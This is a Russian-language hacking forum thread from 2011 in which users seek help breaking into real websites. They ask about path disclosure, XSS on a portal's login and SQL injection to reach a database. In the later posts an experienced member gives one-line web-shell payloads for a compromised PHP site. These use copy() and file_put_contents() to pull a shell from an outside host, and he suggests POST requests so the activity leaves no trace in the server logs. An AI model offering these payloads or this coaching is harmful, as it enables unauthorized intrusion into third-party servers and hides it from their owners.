ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.07.2011, 16:56
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
Использовать поиск по форуму: /showthread.php?t=191917
И внимательно читать не только первый пост.
прочитал всёравно ничего полезного не нашел. Может ктонить помочь плз?
|
|
|
29.07.2011, 17:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
Каким образом найти раскрытие путей?
|
|
|
|
29.07.2011, 17:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
74780
Репутация:
33
|
|
Сообщение от plaeer
plaeer said:
Каким образом найти раскрытие путей?
/showthread.php?t=30632
|
|
|
|
29.07.2011, 17:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от plaeer
plaeer said:
Каким образом найти раскрытие путей?
поиск - классная штука.
Код:
Code:
http://www.google.ru/search?client=opera&rls=en&q=site:forum.antichat.ru+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest
первая ссылка
Код:
Code:
/threadnav30632.html
и ещё куча тем и тому подобного.
|
|
|
|
29.07.2011, 19:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Зашел на один портал, решил проверить логин на xss, при вставке alert('12'); в любое поле(пароль;логин) ифрейм(вводятся данные в ифрейме) выдает -
Server Error in '/' Application.
Код:
Code:
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
можно как-то использовать в своих целях? |
|
|
|
29.07.2011, 21:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Здравствуйте. Помигите пожалуйста.
Допустим сайт вида http://sait.com/tut-tekst/i-tut.html
возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных
|
|
|
|
29.07.2011, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
Такая проблема: залил файл с таким содержанием .
phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
|
|
|
|
29.07.2011, 21:34
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от plaeer
plaeer said:
Такая проблема: залил файл с таким содержанием .
phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
во-первых, http://php.net/manual/ru/function.file-put-contents.php
во-вторых, magic quotes учитывай
а шелл так льется, например:
1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
|
|
|
|
29.07.2011, 22:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
Сообщение от попугай
попугай said:
во-первых, http://php.net/manual/ru/function.file-put-contents.php
во-вторых, magic quotes учитывай
а шелл так льется, например:
1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
1.Прочитал.
2.magic_quotes_gpc On On
3. Не работает.
|
|
|
|
29.07.2011, 23:31
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от plaeer
plaeer said:
1.Прочитал.
2.magic_quotes_gpc On On
3. Не работает.
ну мог бы по аналогии fileputcontens заюзать
1=&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]);
также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
